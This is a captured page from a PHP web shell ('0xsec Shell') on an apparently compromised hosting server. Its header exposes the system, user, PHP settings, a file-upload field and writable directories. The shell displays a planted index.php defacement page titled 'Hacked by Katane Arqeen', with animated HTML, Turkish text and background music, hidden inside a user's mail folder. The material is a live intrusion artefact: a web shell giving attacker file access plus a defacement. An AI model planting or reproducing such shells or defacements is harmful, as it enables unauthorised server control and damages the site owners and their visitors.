0xsec Shell
0xSec


Server : LiteSpeed
System : Linux webbox1.ncrdns.net 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
User : rahcos ( 1533)
PHP Version : 8.4.23
Disable Function : NONE
Directory :  /home/rahcos/mail/.rahcos.sent.dovecot_list_index_log/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/rahcos/mail/.rahcos.sent.dovecot_list_index_log/index.php
<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hacked by Katane Arqeen</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            background-color: #050505;
            color: #ffffff;
            font-family: 'Courier New', Courier, monospace;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            overflow: hidden;
            /* Renkli ve animasyonlu arka plan */
            background: linear-gradient(-45deg, #0f0c29, #302b63, #24243e, #1a0b2e);
            background-size: 400% 400%;
            animation: gradientBG 15s ease infinite;
        }

        @keyframes gradientBG {
            0% { background-position: 0% 50%; }
            50% { background-position: 100% 50%; }
            100% { background-position: 0% 50%; }
        }

        /* Giriş Ekranı */
        #enter-screen {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: #000000;
            display: flex;
            justify-content: center;
            align-items: center;
            z-index: 50;
            cursor: pointer;
            transition: opacity 1s ease-out, visibility 1s;
        }

        .click-text {
            font-size: 1.2rem;
            letter-spacing: 3px;
            color: #888;
            animation: pulse 2s infinite;
        }

        @keyframes pulse {
            0% { opacity: 0.5; }
            50% { opacity: 1; text-shadow: 0 0 10px rgba(255, 255, 255, 0.5); }
            100% { opacity: 0.5; }
        }

        /* Ana İçerik Konteyneri - Glassmorphism Efekti */
        .container {
            text-align: center;
            max-width: 800px;
            padding: 40px 60px;
            z-index: 2;
            background: rgba(255, 255, 255, 0.03);
            backdrop-filter: blur(10px);
            -webkit-backdrop-filter: blur(10px);
            border: 1px solid rgba(255, 255, 255, 0.05);
            border-radius: 15px;
            box-shadow: 0 15px 35px rgba(0, 0, 0, 0.5);
            opacity: 0;
            transform: scale(0.9);
            transition: opacity 1.5s ease, transform 1.5s ease;
        }

        .container.active {
            opacity: 1;
            transform: scale(1);
        }

        .logo {
            max-width: 160px;
            margin-bottom: 25px;
            border-radius: 50%;
            box-shadow: 0 0 30px rgba(75, 0, 130, 0.6);
        }

        h1 {
            font-size: 2.5rem;
            font-weight: bold;
            text-transform: uppercase;
            letter-spacing: 5px;
            color: #fff;
            text-shadow: 0 0 10px rgba(255, 255, 255, 0.2), 0 0 20px rgba(138, 43, 226, 0.4);
            margin-bottom: 10px;
        }

        h2 {
            font-size: 1.1rem;
            color: #a9a9a9;
            letter-spacing: 3px;
            margin-bottom: 35px;
            text-transform: lowercase;
        }

        .message {
            font-size: 1.1rem;
            color: #e0e0e0;
            min-height: 24px;
            border-right: 2px solid #fff;
            white-space: nowrap;
            overflow: hidden;
            display: inline-block;
            padding-right: 5px;
        }

        .overlay-lines {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: repeating-linear-gradient(
                0deg,
                rgba(0, 0, 0, 0.1),
                rgba(0, 0, 0, 0.1) 1px,
                transparent 1px,
                transparent 3px
            );
            pointer-events: none;
            z-index: 1;
        }
    </style>
</head>
<body>

    <audio id="bg-music" loop>
        <source src="https://www.soundhelix.com/examples/mp3/SoundHelix-Song-1.mp3" type="audio/mpeg">
    </audio>

    <div class="overlay-lines"></div>

    <div id="enter-screen">
        <div class="click-text">[ giriş yapmak için ekrana tıkla ]</div>
    </div>

    <div class="container" id="main-content">
        <img src="https://i.hizliresim.com/1zrvzp0.jpg" alt="Katane Arqeen Logo" class="logo">
        <h1>hacked by katane arqeen</h1>
        <h2>katane arqeen sunar</h2>
        <p class="message" id="typewriter"></p>
    </div>

    <script>
        const enterScreen = document.getElementById('enter-screen');
        const mainContent = document.getElementById('main-content');
        const bgMusic = document.getElementById('bg-music');
        const textElement = document.getElementById('typewriter');
        
        const textToType = "iyi günler dilerim tabi günler iyiyse";
        let typeIndex = 0;

        // Yazı daktilo efekti fonksiyonu
        function typeWriter() {
            if (typeIndex < textToType.length) {
                textElement.innerHTML += textToType.charAt(typeIndex);
                typeIndex++;
                setTimeout(typeWriter, 80); // Yazma hızı
            } else {
                // İmleç yanıp sönme efekti
                setInterval(() => {
                    textElement.style.borderRightColor = textElement.style.borderRightColor === 'transparent' ? '#fff' : 'transparent';
                }, 500);
            }
        }

        // Ekrana tıklandığında çalışacak olay
        enterScreen.addEventListener('click', () => {
            // Sesi başlat
            bgMusic.volume = 0.5; // Ses seviyesi (%50)
            bgMusic.play();

            // Giriş ekranını gizle
            enterScreen.style.opacity = '0';
            setTimeout(() => {
                enterScreen.style.visibility = 'hidden';
            }, 1000);

            // Ana içeriği görünür yap ve animasyonu başlat
            mainContent.classList.add('active');

            // Yazı efektini gecikmeli başlat
            setTimeout(typeWriter, 1500);
        });
    </script>
</body>
</html>

c0oded By c0rpz